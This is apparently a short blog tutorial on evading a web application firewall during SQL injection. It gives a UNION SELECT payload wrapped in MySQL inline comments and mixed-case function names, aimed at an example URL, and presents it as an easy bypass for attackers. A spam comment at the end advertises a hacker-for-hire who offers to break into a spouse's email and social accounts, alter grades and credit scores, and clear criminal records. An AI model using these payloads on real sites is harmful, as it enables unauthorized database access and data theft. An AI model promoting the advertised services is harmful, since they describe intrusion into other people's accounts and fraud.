html

Security : How To Bypass Sql injection's WAF


I already talked about SQL injection vulnerability, but today we will talk about how can you bypass the SQL injection's WAF.
What is WAF ?
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such ascross-site scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
How To Bypass WAF ?

For sql injection, bypassing WAF is very easy, but you must know how to exploit sql injection manually !
here we have a vulnerable url :
http://example.com/sqli.php?id=1' ( mysql error )
Now let's try to use the UNION SELECT statement and see what's will happened !
http://example.com/sqli.php?id=1+union+select+1 ( 403 FROBIDDEN )
If you see the 403 FORBIDDEN page, that's mean that WAF is enabled. so how can us bypass it ?
Simply, we gonna add some mysql-comments characters for our command.
So it will be :
UNION+SELECT >  /*!UNION*/+/*!SELECT*/
group_concat(table_name) >  /*!GrOuP_CoNcAT(table_name)*/
group_concat(column_name) >  /*!GrOuP_CoNcAT(column_name)*/

So, after Replacing the normal commands with those commands, you will see that the 403 error Has been bypassed Successfully.
example :
http://example.com/sqli.php?id=1+/*!UNION*/+/*!SELECT*/+1 > No errors the sql injection excuted successfully !
For more commands, you can visit this Link : SQL INJECTION COMMANDS

Previous
Next Post »

1 comments:

Write comments
felisha green
AUTHOR
October 27, 2020 at 5:02 PM delete

Do you need to increase your credit score?
Do you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com

Reply
avatar